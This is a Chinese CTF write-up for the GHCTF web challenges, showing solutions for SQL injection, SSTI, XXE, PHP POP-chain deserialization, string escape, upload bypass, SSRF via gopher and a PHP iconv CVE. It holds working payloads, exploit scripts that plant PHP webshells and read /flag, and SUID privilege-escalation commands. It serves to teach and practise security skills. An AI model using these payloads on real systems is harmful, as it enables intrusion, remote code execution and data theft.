GHCTF-web-wp
web
SQL???(sqlite)
显然,注入点很明显
直接看有几个字段,试出来5个
2,3,4,5有回显
看上面推荐的文章,直接打payload
查到表后查flag
此题可以用sqlmap,只是这里过滤了agent,所以得用--random-agent绕过。比如查表
--random-agent 随机切换UA(User-Agent),space2comment.py 是指用/**/代替空格。 文章 - sqlite注入的一点总结 - 先知社区
upload?SSTI!
此题给了源码
import os
import re
from flask import Flask, request, jsonify, render_template_string, send_from_directory, abort, redirect
from werkzeug.utils import secure_filename
import os
from werkzeug.utils import secure_filenameapp = Flask(__name__)# 配置信息
UPLOAD_FOLDER = 'static/uploads' # 上传文件保存目录
ALLOWED_EXTENSIONS = {'txt', 'log', 'text','md','jpg','png','gif'} # 允许上传的文件扩展名
MAX_CONTENT_LENGTH = 16 * 1024 * 1024 # 限制上传大小为 16MBapp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = MAX_CONTENT_LENGTH# 创建上传目录(如果不存在)
os.makedirs(UPLOAD_FOLDER, exist_ok=True)def is_safe_path(basedir, path):""""检查给定的路径是否安全,即是否为base目录的子目录"""return os.path.commonpath([basedir,path]) == basedirdef contains_dangerous_keywords(file_path):"""检查文件内容是否包含危险关键字"""dangerous_keywords = ['_', 'os', 'subclasses', '__builtins__', '__globals__',', 'flag',]with open(file_path, 'rb') as f:file_content = str(f.read())for keyword in dangerous_keywords:if keyword in file_content:return True # 找到危险关键字,返回 Truereturn False # 文件内容中没有危险关键字def allowed_file(filename):"""检查文件名和扩展名是否允许上传"""return '.' in filename and \filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS@app.route('/', methods=['GET', 'POST'])
def upload_file():"""处理文件上传的路由"""if request.method == 'POST':# 检查是否有文件被上传if 'file' not in request.files:return jsonify({"error": "未上传文件"}), 400file = request.files['file']# 检查是否选择了文件if file.filename == '':return jsonify({"error": "请选择文件"}), 400# 验证文件名和扩展名if file and allowed_file(file.filename):# 安全处理文件名filename = secure_filename(file.filename)# 保存文件save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)file.save(save_path)# 返回文件路径(绝对路径)return jsonify({"message": "File uploaded successfully","path": os.path.abspath(save_path)}), 200else:return jsonify({"error": "文件类型错误"}), 400# GET 请求显示上传表单(可选)return '''<!doctype html><title>Upload File</title><h1>Upload File</h1><form method=post enctype=multipart/form-data><input type=file name=file><input type=submit value=Upload></form>'''@app.route('/file/<path:filename>')
def view_file(filename):"""路由用于查看上传的文件"""try:# 1. 过滤文件名safe_filename = secure_filename(filename)if not safe_filename:abort(400, description="无效文件名")# 2. 构造完整路径file_path = os.path.join(app.config['UPLOAD_FOLDER'], safe_filename)# 3. 路径安全检查if not is_safe_path(app.config['UPLOAD_FOLDER'], file_path):abort(403, description="禁止访问的路径")# 4. 检查文件是否存在if not os.path.isfile(file_path):abort(404, description="文件不存在")suffix=os.path.splitext(filename)[1]print(suffix)if suffix==".jpg" or suffix==".png" or suffix==".gif":return send_from_directory("static/uploads/",filename,mimetype='image/jpeg')if contains_dangerous_keywords(file_path):# 删除不安全的文件os.remove(file_path)return jsonify({"error": "Waf!!!"}), 400with open(file_path, 'rb') as f:file_data = f.read().decode('utf-8')tmp_str = """<!DOCTYPE html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>查看文件内容</title></head><body><h1>文件内容:{name}</h1> <!-- 显示文件名 --><pre>{data}</pre> <!-- 显示文件内容 --><footer><p>© 2025 文件查看器</p></footer></body></html>"".format(name=safe_filename, data=file_data)return render_template_string(tmp_str)except Exception as e:app.logger.error(f"文件查看失败: {str(e)}")abort(500, description="文件查看失败:{} ".format(str(e)))# 错误处理(可选)
@app.errorhandler(404)
def not_found(error):"""处理404错误"""return {"error": error.description}, 404@app.errorhandler(403)
def forbidden(error):"""处理403错误"""return {"error": error.description}, 403if __name__ == '__main__':app.run("0.0.0.0",debug=False)这题一眼文件上传里面考ssti,文件上传没啥好说,ssti有些过滤,先随便打个试试注入点
审计代码可以知道访问/file/shell.txt
看来没错了。这题多讲几个姿势,这题我比赛咋写的呢?
解法一:传统找索引
这里我用\x5f绕过下划线,注意,这里困难的是需要两次base才能找到基类
{{()['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubc''lasses\x5f\x5f']()[137]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglob''als\x5f\x5f']['popen']('cat /fla?').read()}}解法二:利用lipsum+\x5f + 用''绕过关键词
这个其实和上面差不多。
{{lipsum['\x5f\x5fglob''als\x5f\x5f']['o''s'].popen('cat /fla?').read()}}解法三 :利用lipsum+unicode+attr
接下来用enicode编码配合atter ,对于绕过下划线与关键词是相当不错(而且这里可绕过中括号,点号)
{{lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f")|attr("\u0067\u0065\u0074")("\u006f\u0073")|attr("\u0070\u006f\u0070\u0065\u006e")("cat /fla?")|attr("\u0072\u0065\u0061\u0064")()}}
可惜的是flag在环境变量没有。
(>﹏<)(xxe)
from flask import Flask, request # 导入Flask框架和请求对象
import base64 # 导入base64模块,用于数据编码和解码
from lxml import etree # 导入lxml的etree模块,用于XML解析
import re # 导入正则表达式模块app = Flask(__name__) # 创建Flask应用实例@app.route('/')
def index():# 返回当前Python文件的源代码return open(__file__).read()@app.route('/ghctf', methods=['POST'])
def parse():# 获取POST请求中名为'xml'的表单数据xml = request.form.get('xml')print(xml) # 打印接收到的XML数据# 如果没有接收到XML数据,返回提示信息if xml is None:return "No System is Safe."# 创建XML解析器,启用DTD加载和实体解析parser = etree.XMLParser(load_dtd=True, resolve_entities=True)# 使用解析器解析XML字符串,返回XML树的根节点root = etree.fromstring(xml, parser)# 查找XML中的'name'标签,并获取其文本内容name = root.find('name').text# 返回找到的name值,如果没有找到则返回Nonereturn name or Noneif __name__ == "__main__":# 启动Flask应用,监听所有网络接口的8080端口app.run(host='0.0.0.0', port=8080)
import requests# 目标URL
url = "http://node1.anna.nssctf.cn:28284/ghctf"# 恶意构造的XML数据,利用XXE读取flag文件
xml_data = """<?xml version="1.0" ?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///flag">]>
<z3r4y>
<name>&xxe;</name>
</z3r4y>"""# 发送POST请求
response = requests.post(url, data={'xml': xml_data})# 打印响应内容
print("Response:", response.text)Popppppp
先看源码
<?php
error_reporting(0);class CherryBlossom {public $fruit1;public $fruit2;public function __construct($a) {$this->fruit1 = $a;}function __destruct() {echo $this->fruit1;}public function __toString() {$newFunc = $this->fruit2;return $newFunc();}
}class Forbidden {private $fruit3;public function __construct($string) {$this->fruit3 = $string;}public function __get($name) {$var = $this->$name;$var[$name]();}
}class Warlord {public $fruit4;public $fruit5;public $arg1;public function __call($arg1, $arg2) {$function = $this->fruit4;return $function();}public function __get($arg1) {$this->fruit5->ll2('b2');}
}class Samurai {public $fruit6;public $fruit7;public function __toString() {$long = @$this->fruit6->add();return $long;}public function __set($arg1, $arg2) {if ($this->fruit7->tt2) {echo "xxx are the best!!!";}}
}class Mystery {public function __get($arg1) {array_walk($this, function ($day1, $day2) {$day3 = new $day2($day1);foreach ($day3 as $day4) {echo ($day4 . '<br>');}});}
}class Princess {protected $fruit9;protected function addMe() {return "The time spent with xxx is my happiest time" . $this->fruit9;}public function __call($func, $args) {call_user_func([$this, $func . "Me"], $args);}
}class Philosopher {public $fruit10;public $fruit11="sr22kaDugamdwTPhG5zU";public function __invoke() {if (md5(md5($this->fruit11)) == 666) {return $this->fruit10->hey;}}
}class UselessTwo {public $hiddenVar = "123123";public function __construct($value) {$this->hiddenVar = $value;}public function __toString() {return $this->hiddenVar;}
}class Warrior {public $fruit12;private $fruit13;public function __set($name, $value) {$this->$name = $value;if ($this->fruit13 == "xxx") {strtolower($this->fruit12);}}
}class UselessThree {public $dummyVar;public function __call($name, $args) {return $name;}
}class UselessFour {public $lalala;public function __destruct() {echo "Hehe";}
}if (isset($_GET['GHCTF'])) {unserialize($_GET['GHCTF']);
} else {highlight_file(__FILE__);
}这题有3个点比较复杂,一是找漏洞点,就是读flag的地方,二是构造pop链(因为干扰项太多了),三是绕过双md5。这里没有命令执行函数,所以首先想到原生类函数,既可以读取目录,也可以读取文件内容。
PHP原生类在Web安全中的利用总结-CSDN博客
显然可以用DirectoryIterator读取目录,再用SplFileObject 类读取内容。测试代码上文有。下文是测试array_walk的用法。(顺便测试一下DirectoryIterator)
PHP: array_walk - Manual,array_walk前面的参数是数组,后面是方法
然后就是找链子, 首先是确定了Mystery是尾链,然后他前一个只能是__invoke,因为访问不存在的键会触发它(__set不行,触发不了它)。之后要触发inoke有2条路,第一个是Warlord中的__call,如果选它的话,那么触发它的链是 Samurai中的__toString,然后其前面是CherryBlossom中的__destruct
所以此链子是:
CherryBlossom(__destruct)->Samurai(__toString)->Warlord(__call)->Philosopher(__invoke)->Mystery
但是这里显然有更好的一条链子,之前说到__invoke,触发其的另一条路是CherryBlossom中的__toString,然后tostring又被CherryBlossom中的__destruct触发。此链是:
CherryBlossom(__destruct)->CherryBlossom(__toString)->Philosopher(__invoke)->Mystery (接下来就用这条链子做例子)
最后是绕过双md5,直接问gpt写一个暴力破解的就行,因为这是弱比较,所以只需要加密后数字前3位=666,第四位是英文就行。
import hashlib
import random
import stringdef double_md5(a):# 对a进行两次MD5加密md5_1 = hashlib.md5(a.encode()).hexdigest()md5_2 = hashlib.md5(md5_1.encode()).hexdigest()return md5_2def generate_random_string(length=8):# 生成一个随机字符串作为候选aletters = string.ascii_letters + string.digitsreturn ''.join(random.choice(letters) for _ in range(length))def find_a():attempts = 0while True:a = generate_random_string()result = double_md5(a)attempts += 1# 检查前三位是否是666,第四位是否是字母if result.startswith('666') and result[3].isalpha():print(f"找到符合条件的a: {a}")print(f"两次MD5后的结果: {result}")print(f"尝试次数: {attempts}")return aif __name__ == "__main__":find_a()所以最后的exp是
<?phpclass CherryBlossom {public $fruit1;public $fruit2;function __destruct() {echo $this->fruit1; // 析构函数,在对象销毁时输出fruit1的值}public function __toString() {$newFunc = $this->fruit2;return $newFunc(); // 当对象被转换为字符串时,调用fruit2属性所指向的函数}
}class Mystery {public $DirectoryIterator="/";//glob:///f*public function __get($arg1) {array_walk($this, function ($day1, $day2) {$day3 = new $day2($day1);foreach ($day3 as $day4) {echo ($day4 . '<br>'); // 当访问不存在的属性时,执行此方法}});}
} class Philosopher {public $fruit10;public $fruit11 = "iqivJ78A";public function __invoke() {if (md5(md5($this->fruit11)) == 666) {return $this->fruit10->hey; // 当对象被当作函数调用时,执行此方法}}#3
}$a=new CherryBlossom();
$a->fruit1=new CherryBlossom();
$a->fruit1->fruit2=new Philosopher();
$a->fruit1->fruit2->fruit10=new Mystery();echo serialize($a);// 序列化$cherry对象并输出
echo "\n".urlencode(serialize(($a)));官方wp用的是GlobIterator,其实差不多
最后改一下Mystery里就行。
Escape!
此题考代码审计,杂糅代码绕过与字符串逃逸
审计这个文件写入页面代码,关键点use->isadmin=true,第二就是一个杂糅代码绕过,显然直接伪协议的文件源码读取配合写入一句话木马,所以这里有
filename=php://filter/convert.base64-decode/resource=shell.phptxt=aPD9waHAgZXZhbCgkX1BPU1RbMTIzXSk/Pg==这里一句话木马前必须要一个字符,不然不能进行base64解码
接下来继续审计。简单看⼀下login的逻辑,可以发现其login函数返回的是⼀个User类,然后将这个类进⾏序列化后⽤waf 检测⼀下之后使⽤setSignedCookie进⾏加密。⽽waf函数是对关键字进⾏替换,这就导致了序列化的字符数量发⽣了改变,从⽽导致了字符串逃逸。
所以就可以看出这个题目来龙去脉了,先注册,然后登入,用户存在的话就序列化User,再waf替换进入文件写入页面,再反序列化,接下来如果user->isadmin=true,然后就绕过杂糅函数写入一句话木马读取flag。所以这里的话User里面一定要isadmin=true,password随便设,只要注册登入一样就行。username就要构造字符串逃逸了,首先测试一下
测试一下红框内多少字符
21个,flag被替换多一个字符,所以需要21个flag再接上";s:7:"isadmin";b:1;} 这样被替换后字符数还是不变。所以有password随便
username=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";s:7:"isadmin";b:1;} 最终脚本是(一步一步做有点麻烦了)这里使用 requests.Session() 的主要目的是保持会话状态(确保请求能够携带会话信息,显然这里是cookie)
import requests
def exp(url):data={"username":'flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";s:7:"isadmin";b:1;}',"password":"123456"
}r=requests.post(url+"register.php",data=data)#print(r.text)session = requests.Session()login_response = session.post(url+"login.php", data=data)shell={"filename":"php://filter/convert.base64-decode/resource=shell.php","txt":"aPD9waHAgZXZhbCgkX1BPU1RbMTIzXSk/Pg=="}protected_response = session.post(url+"dashboard.php",data=shell)response = requests.post(url+"shell.php",data={"123":"system('cat /flag');"})print(response.text)
if __name__=="__main__":url="http://node6.anna.nssctf.cn:26963/"exp(url)UPUPUP
经过尝试,这里后端应该只限制了所以php形式的文件
而且经过尝试,发现它会检测文件内容(getimagesize()和exif_imagetype检测)所以一般只要在文件头放GIF89a之类的图片文件头就可以绕过
这里是apache服务器,所以可以用user.ini与htaccess进行绕过,但是尝试发现user.ini被禁用,所以只能用htaccess。
但是用htaccess的话文件内容不能用gif89a,不然会破坏htaccess文件格式,使得其失效,所以就得用别得方法,下面两文章可以看看,其中一篇讲述了绕过的2种方法,分别是\x00与#(这样检测文件内容是就会被认为是xbm与wbmp文件,且不会破坏htaccess格式,从而绕过)
php 文件上传.htaccess getimagesize和exif_imagetype绕过_getimagesize图片类型绕过-CSDN博客
文件上传-文件头绕过getimagesize()_getimagesize绕过-CSDN博客
#define width 1
#define height 1
同理啊jpg里面也要如此
之后蚁剑连接url/加文件路径,flag在根目录
GetShell
这题考代码审计与提权
<?php
highlight_file(__FILE__); // 显示当前文件的源代码,便于调试和查看// 配置加载类,用于存储和获取配置信息
class ConfigLoader {private $config; // 存储配置的私有属性// 构造方法,初始化配置信息public function __construct() {$this->config = ['debug' => true, // 是否开启调试模式'mode' => 'production', // 运行模式'log_level' => 'info', // 日志级别'max_input_length' => 100, // 最大输入长度'min_password_length' => 8, // 最小密码长度'allowed_actions' => ['run', 'debug', 'generate'] // 允许的操作];}// 获取指定键的配置值public function get($key) {return $this->config[$key] ?? null; // 使用null合并运算符,若键不存在则返回null}
}// 日志记录类
class Logger {private $logLevel; // 存储日志级别// 构造方法,初始化日志级别public function __construct($logLevel) {$this->logLevel = $logLevel;}// 记录日志的方法public function log($message, $level = 'info') {// 仅当消息的日志级别与当前日志级别相同时才记录if ($level === $this->logLevel) {echo "[LOG] $message\n"; // 输出日志信息}}
}// 用户管理类
class UserManager {private $users = []; // 存储用户信息的私有属性private $logger; // 日志记录器// 构造方法,接收日志记录器public function __construct($logger) {$this->logger = $logger;}// 添加用户的方法public function addUser($username, $password) {// 检查用户名长度是否符合要求if (strlen($username) < 5) {return "Username must be at least 5 characters"; // 返回错误信息}// 检查密码长度是否符合要求if (strlen($password) < 8) {return "Password must be at least 8 characters"; // 返回错误信息}// 对密码进行哈希处理并存储$this->users[$username] = password_hash($password, PASSWORD_BCRYPT);// 记录添加用户日志$this->logger->log("User $username added");return "User $username added"; // 返回成功信息}// 验证用户登录信息的方法public function authenticate($username, $password) {// 检查用户名和密码是否匹配if (isset($this->users[$username]) && password_verify($password, $this->users[$username])) {// 记录用户登录日志$this->logger->log("User $username authenticated");return "User $username authenticated"; // 返回成功信息}return "Authentication failed"; // 返回失败信息}
}// 字符串工具类
class StringUtils {// 对输入进行安全处理的方法public static function sanitize($input) {// 使用htmlspecialchars函数对特殊字符进行转义return htmlspecialchars($input, ENT_QUOTES, 'UTF-8');}// 生成随机字符串的方法public static function generateRandomString($length = 10) {// 生成指定长度的随机字符串return substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length / strlen($x)))), 1, $length);}
}// 输入验证类
class InputValidator {private $maxLength; // 最大输入长度// 构造方法,接收最大输入长度public function __construct($maxLength) {$this->maxLength = $maxLength;}// 验证输入的方法public function validate($input) {// 检查输入长度是否超过最大限制if (strlen($input) > $this->maxLength) {return "Input exceeds maximum length of {$this->maxLength} characters"; // 返回错误信息}return true; // 验证通过返回true}
}// 命令执行类
class CommandExecutor {private $logger; // 日志记录器// 构造方法,接收日志记录器public function __construct($logger) {$this->logger = $logger;}// 执行命令的方法public function execute($input) {// 检查输入中是否包含空格,防止命令注入攻击if (strpos($input, ' ') !== false) {$this->logger->log("Invalid input: space detected"); // 记录日志die('No spaces allowed'); // 终止程序并输出错误信息}// 执行命令并获取输出@exec($input, $output); // @符号用于抑制错误信息// 记录命令执行结果日志$this->logger->log("Result: $input");// 返回命令输出结果return implode("\n", $output);}
}// 动作处理类
class ActionHandler {private $config; // 配置信息private $logger; // 日志记录器private $executor; // 命令执行器// 构造方法,接收配置信息和日志记录器public function __construct($config, $logger) {$this->config = $config;$this->logger = $logger;// 初始化命令执行器$this->executor = new CommandExecutor($logger);}// 处理动作的方法public function handle($action, $input) {// 检查动作是否在允许的操作列表中if (!in_array($action, $this->config->get('allowed_actions'))) {return "Invalid action"; // 返回错误信息}// 根据不同动作执行相应操作if ($action === 'run') {// 创建输入验证器$validator = new InputValidator($this->config->get('max_input_length'));// 验证输入$validationResult = $validator->validate($input);if ($validationResult !== true) {return $validationResult; // 返回验证错误信息}// 执行命令并返回结果return $this->executor->execute($input);} elseif ($action === 'debug') {return "Debug mode enabled"; // 返回调试模式开启信息} elseif ($action === 'generate') {// 生成随机字符串并返回return "Random string: " . StringUtils::generateRandomString(15);}return "Unknown action"; // 返回未知动作信息}
}// 检查是否有action参数传入
if (isset($_REQUEST['action'])) {// 初始化配置加载器和日志记录器$config = new ConfigLoader();$logger = new Logger($config->get('log_level'));// 创建动作处理对象$actionHandler = new ActionHandler($config, $logger);// 获取输入参数$input = $_REQUEST['input'] ?? '';// 处理动作并输出结果echo $actionHandler->handle($_REQUEST['action'], $input);
} else {// 初始化配置加载器和日志记录器$config = new ConfigLoader();$logger = new Logger($config->get('log_level'));// 创建用户管理对象$userManager = new UserManager($logger);// 处理用户注册请求if (isset($_POST['register'])) {$username = $_POST['username'];$password = $_POST['password'];echo $userManager->addUser($username, $password); // 添加用户并输出结果}// 处理用户登录请求if (isset($_POST['login'])) {$username = $_POST['username'];$password = $_POST['password'];echo $userManager->authenticate($username, $password); // 验证用户并输出结果}// 记录无动作提供的日志$logger->log("No action provided, running default logic");
}
// 输出日志信息
[LOG] No action provided, running default logicai代码审计一下就找到了命令执行的地方
继续审计发现需要action=run才行
直接打一句话木马。
?action=run&input=echo%09PD9waHAgZXZhbCgkX1BPU1RbMF0pOyA/Pg==|base64%09-d>shell.ph蚁剑连接拿flag发现没权限,那就是提权
Linux提权————利用SUID提权_bash提权-CSDN博客
上网搜了一下,直接打命令(随便打一个)
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;发现wc文件有点可以,想读取一下 ,怎么读取呢?
这里提供一个文档
GTFOBins
根据文档有
发现其可以文件读取。点进去就看见wc的用法
Goph3rrr
打开啥也没有,目录扫描,发现源码。
打开简单审计一下
# 登录路由,支持GET和POST方法
@app.route('/Login', methods=['GET', 'POST'])
def login():junk_code() if request.method == 'POST':# 获取表单中的用户名和密码username = request.form.get('username')password = request.form.get('password')# 验证用户名和密码if username in users and users[username]['password'] == hashlib.md5(password.encode()).hexdigest():# 如果验证成功,返回欢迎信息return b64e(f"Welcome back, {username}!")# 如果验证失败,返回错误信息return b64e("Invalid credentials!")# 如果是GET请求,返回登录页面return render_template_string("""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Login</title><link href="<url id="cve3b0gs8jdur8r1bk7g" type="url" status="failed" title="" wc="0">https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css</url> " rel="stylesheet"><style>body {background-color: #f8f9fa;}.container {max-width: 400px;margin-top: 100px;}.card {border: none;border-radius: 10px;box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);}.card-header {background-color: #007bff;color: white;text-align: center;border-radius: 10px 10px 0 0;}.btn-primary {background-color: #007bff;border: none;}.btn-primary:hover {background-color: #0056b3;}</style></head><body><div class="container"><div class="card"><div class="card-header"><h3>Login</h3></div><div class="card-body"><form method="POST"><div class="mb-3"><label for="username" class="form-label">Username</label><input type="text" class="form-control" id="username" name="username" required></div><div class="mb-3"><label for="password" class="form-label">Password</label><input type="password" class="form-control" id="password" name="password" required></div><button type="submit" class="btn btn-primary w-100">Login</button></form></div></div></div></body></html>""")# Gopher路由,用于访问外部URL
@app.route('/Gopher')
def visit():# 获取URL参数url = request.args.get('url')if url is None:# 如果没有提供URL,返回提示信息return "No url provided :)"# 解析URLurl = urlparse(url)# 获取真实IP地址realIpAddress = socket.gethostbyname(url.hostname)# 检查URL方案和IP是否在黑名单中if url.scheme == "file" or realIpAddress in BlackList:return "No (≧∇≦)"# 使用curl命令获取URL内容result = subprocess.run(["curl", "-L", urlunparse(url)], capture_output=True, text=True)# 返回获取到的内容return result.stdout# 注册路由,支持GET和POST方法
@app.route('/RRegister', methods=['GET', 'POST'])
def register():junk_code() # 调用无用代码函数if request.method == 'POST':# 获取表单中的用户名和密码username = request.form.get('username')password = request.form.get('password')# 检查用户名是否已存在if username in users:return b64e("Username already exists!")# 如果用户名不存在,添加到用户字典中users[username] = {'password': hashlib.md5(password.encode()).hexdigest()}# 返回注册成功信息return b64e("Registration successful!")# 如果是GET请求,返回注册页面return render_template_string("""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Register</title><link href="<url id="cve3b0gs8jdur8r1bk7g" type="url" status="failed" title="" wc="0">https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css</url> " rel="stylesheet"><style>body {background-color: #f8f9fa;}.container {max-width: 400px;margin-top: 100px;}.card {border: none;border-radius: 10px;box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);}.card-header {background-color: #28a745;color: white;text-align: center;border-radius: 10px 10px 0 0;}.btn-success {background-color: #28a745;border: none;}.btn-success:hover {background-color: #218838;}</style></head><body><div class="container"><div class="card"><div class="card-header"><h3>Register</h3></div><div class="card-body"><form method="POST"><div class="mb-3"><label for="username" class="form-label">Username</label><input type="text" class="form-control" id="username" name="username" required></div><div class="mb-3"><label for="password" class="form-label">Password</label><input type="password" class="form-control" id="password" name="password" required></div><button type="submit" class="btn btn-success w-100">Register</button></form></div></div></div></body></html>""")# 管理路由,用于执行命令
@app.route('/Manage', methods=['POST'])
def cmd():# 检查请求是否来自本地if request.remote_addr != "127.0.0.1":return "Forbidden!!!"# 如果是GET请求,返回允许信息if request.method == "GET":return "Allowed!!!"# 如果是POST请求,执行命令并返回结果if request.method == "POST":return os.popen(request.form.get("cmd")).read()# 上传头像路由,支持GET和POST方法
@app.route('/Upload', methods=['GET', 'POST'])
def upload_avatar():junk_code() # 调用无用代码函数if request.method == 'POST':# 获取表单中的用户名username = request.form.get('username')# 检查用户名是否存在if username not in users:return b64e("User not found!")# 获取上传的文件file = request.files.get('avatar')if file:# 保存文件到指定目录file.save(os.path.join(avatar_dir, f"{username}.png"))# 返回上传成功信息return b64e("Avatar uploaded successfully!")# 如果没有文件上传,返回错误信息return b64e("No file uploaded!")# 如果是GET请求,返回上传页面return render_template_string("""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Upload Avatar</title><link href="<url id="cve3b0gs8jdur8r1bk7g" type="url" status="failed" title="" wc="0">https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css</url> " rel="stylesheet"><style>body {background-color: #f8f9fa;}.container {max-width: 400px;margin-top: 100px;}.card {border: none;border-radius: 10px;box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);}.card-header {background-color: #dc3545;color: white;text-align: center;border-radius: 10px 10px 0 0;}.btn-danger {background-color: #dc3545;border: none;}.btn-danger:hover {background-color: #c82333;}</style></head><body><div class="container"><div class="card"><div class="card-header"><h3>Upload Avatar</h3></div><div class="card-body"><form method="POST" enctype="multipart/form-data"><div class="mb-3"><label for="username" class="form-label">Username</label><input type="text" class="form-control" id="username" name="username" required></div><div class="mb-3"><label for="avatar" class="form-label">Avatar</label><input type="file" class="form-control" id="avatar" name="avatar" required></div><button type="submit" class="btn btn-danger w-100">Upload</button></form></div></div></div></body></html>""")# 下载源码路由
@app.route('/app.py')
def download_source():# 返回当前文件作为附件return send_file(__file__, as_attachment=True)if __name__ == '__main__':# 启动Flask应用app.run(host='0.0.0.0', port=8000)这里是执行命令
这里看名字也能猜到一点是gopher协议,联系上面,显然是打gopher的post请求
看下下面的文章,尤其是第一篇,不然后面的步骤可能有点难理解
Gopher协议原理和限制介绍——Gopher协议支持发出GET、POST请求(类似协议转换):可以先截获get请求包和post请求包,在构成符合gopher协议的请求 - bonelee - 博客园 SSRF利用协议中的万金油——Gopher_gopherus工具-CSDN博客
从0到1完全掌握 SSRF - FreeBuf网络安全行业门户
构造post数据包(至于为什么这样构造,看第一篇文章)
POST /Manage HTTP/1.1
host:127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7cmd=env2次url编码。
接下来就打gopher(127.0.0.1被过滤,直接127.0.0.2其实0.0.0.0也行)
Gopher?url=gopher://127.0.0.2:8000/_POST%20/Manage%20HTTP/1.1%0Ahost:127.0.0.1%0AContent-Type:%20application/x-www-form-urlencoded%0AContent-Length:%207%0A%0Acmd=envimport urllib.parse
payload =\
"""POST /Manage HTTP/1.1
Host: 127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 7cmd=env
"""#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://0.0.0.0:8000/'+'_'+new
result = urllib.parse.quote(result)
print(result) # 这里因为是GET请求所以要进行两次url编码#gopher%3A//0.0.0.0%3A8000/_POST%2520/Manage%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A8000%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%25207%250D%250A%250D%250Acmd%253Denv%250D%250A
这里复制一下大佬的做法直接脚本秒
GHCTF2025--Web_ghctf 2025 wp-CSDN博客
这题其实很难的,可能有的人知道做法,但是没想到在环境变量里就炸了 ,尤其是手打payload。
ez_readfile
解法一是直接读docker-entrypoint.sh敏感文件
这里MD5碰撞就不多解释
a=fuck%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00O%EC%28%FE%D4%C2%22%FA%40Lx%CFC%3CqMx%975%EA%0F%B7Tq%28.%7F%26%D7%8A2%F8%EC%08%BC%E9%60j%0B%DA%CF%05%40q%C2%DDa7%D0%40%C6i%97%10l%84%9D%BA%7FK%7E%FEq%A6%3F%E4%5Dl%06%7F%7F%0A%05%F6%DB%EDQ%ED%28%3D%CEhjj%15%FC%A0X%C1%1B%F5%CC%CD0%5D%A2%F5P%17%03.%8Crb%93%83%C0%EF%C2AF%88%DC%97%A0%85%CF%DA%A2G%F6%D7%0Cw%0E%A3%94%9B&b=fuck%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00O%EC%28%FE%D4%C2%22%FA%40Lx%CFC%3CqMx%975j%0F%B7Tq%28.%7F%26%D7%8A2%F8%EC%08%BC%E9%60j%0B%DA%CF%05%40q%C2%5Db7%D0%40%C6i%97%10l%84%9D%BA%7F%CB%7E%FEq%A6%3F%E4%5Dl%06%7F%7F%0A%05%F6%DB%EDQ%ED%28%3D%CEhj%EA%15%FC%A0X%C1%1B%F5%CC%CD0%5D%A2%F5P%17%03.%8Crb%93%83%C0%EF%C2%C1E%88%DC%97%A0%85%CF%DA%A2G%F6%D7%0C%F7%0E%A3%94%9B
解法二打cve2024-2961
实话,这个解法有点没看懂,直接上脚本吧
https://github.com/kezibei/php-filter-iconv
该脚本只要当前⽬录中有⽬标靶机的/proc/self/maps和libc.so⽂件,即可将payload跑出来,让我们⾃ ⼰去运⾏。
首先得到maps文件还有libc位置。
然后拿libc内容,但是有些字符复制不了
所以直接读base64字符
?file=php://filter/read=convert.base64-encode/resource=/lib/x86_64-linux-gnu/libc-2.31.so
然后将结果保存为libc-2-23.so
项目有代码使用方法
将两个文件与代码放在同一目录,然后将cmd改一下
cmd = "echo '<?php system($_GET[\"cmd\"]); ?>' > /var/www/html/shell.php"
然后直接打paylaod
之后就是命令执行了
不想下载的师傅为你准备好了代码
# <?php
# $file = $_REQUEST['file'];
# $data = file_get_contents($file);
# echo $data;from dataclasses import dataclass
from pwn import *
import zlib
import os
import binasciiHEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")@dataclass
